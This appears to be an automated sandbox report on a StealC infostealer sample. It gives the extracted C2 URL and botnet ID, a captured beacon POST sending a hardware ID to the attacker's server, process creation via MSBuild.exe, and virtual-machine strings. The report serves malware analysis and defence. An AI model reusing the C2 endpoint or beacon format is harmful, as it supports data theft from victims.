Source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack |
Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"} |
Source: Aew8SXjXEb.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: Malware configuration extractor |
URLs: http://62.204.41.150/edd20096ecef326d.php |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF-- |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.182.143.211 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_00406280 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile, |
1_2_00406280 |
Source: unknown |
HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF-- |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150 |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/ |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/J |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/L |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/S |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/Y |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php0 |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5 |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php; |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpi |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpoca. |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpu |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpx& |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/z |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150E |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150G |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150ig |
Source: Amcache.hve.6.dr |
String found in binary or memory: http://upx.sf.net |
Source: unknown |
Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49744 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49742 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49672 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49676 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49746 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49742 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49748 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49748 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49746 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00622021 |
0_2_00622021 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0062729C |
0_2_0062729C |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0063D39B |
0_2_0063D39B |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0063572C |
0_2_0063572C |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0067094F |
0_2_0067094F |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0062CAF2 |
0_2_0062CAF2 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0063BB36 |
0_2_0063BB36 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00633C92 |
0_2_00633C92 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00621D79 |
0_2_00621D79 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0062FEF0 |
0_2_0062FEF0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: String function: 004045C0 appears 317 times |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: String function: 00627B80 appears 49 times |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272 |
Source: Aew8SXjXEb.exe, 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe |
Source: Aew8SXjXEb.exe |
Binary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe |
Source: classification engine |
Classification label: mal100.troj.evad.winEXE@4/5@0/1 |
Source: C:\Windows\SysWOW64\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6032 |
Source: Aew8SXjXEb.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: unknown |
Process created: C:\Users\user\Desktop\Aew8SXjXEb.exe "C:\Users\user\Desktop\Aew8SXjXEb.exe" |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272 |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Section loaded: apphelp.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: wininet.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: rstrtmgr.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ncrypt.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ntasn1.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: iertutil.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: windows.storage.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: wldp.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: profapi.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: winhttp.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: iphlpapi.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: winnsi.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: urlmon.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: netutils.dll |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: Aew8SXjXEb.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
1_2_0041C03D |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_006271AD push ecx; ret |
0_2_006271C0 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00667F0D push ecx; ret |
0_2_00667F20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041B035 push ecx; ret |
1_2_0041B048 |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.6.dr |
Binary or memory string: vmci.syshbin |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67 |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware, Inc. |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.6.dr |
Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.6.dr |
Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.6.dr |
Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.6.dr |
Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.6.dr |
Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.6.dr |
Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.6.dr |
Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.6.dr |
Binary or memory string: vmci.sys |
Source: Amcache.hve.6.dr |
Binary or memory string: vmci.syshbin` |
Source: Amcache.hve.6.dr |
Binary or memory string: \driver\vmci,\driver\pci |
Source: Amcache.hve.6.dr |
Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware20,1 |
Source: Amcache.hve.6.dr |
Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.6.dr |
Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: VMwareVMware |
Source: Amcache.hve.6.dr |
Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.6.dr |
Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.6.dr |
Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware PCI VMCI Bus Device |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: VMwareVMwareP |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware VMCI Bus Device |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.6.dr |
Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW@ |
Source: Amcache.hve.6.dr |
Binary or memory string: vmci.inf_amd64_68ed49469341f563 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00627922 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
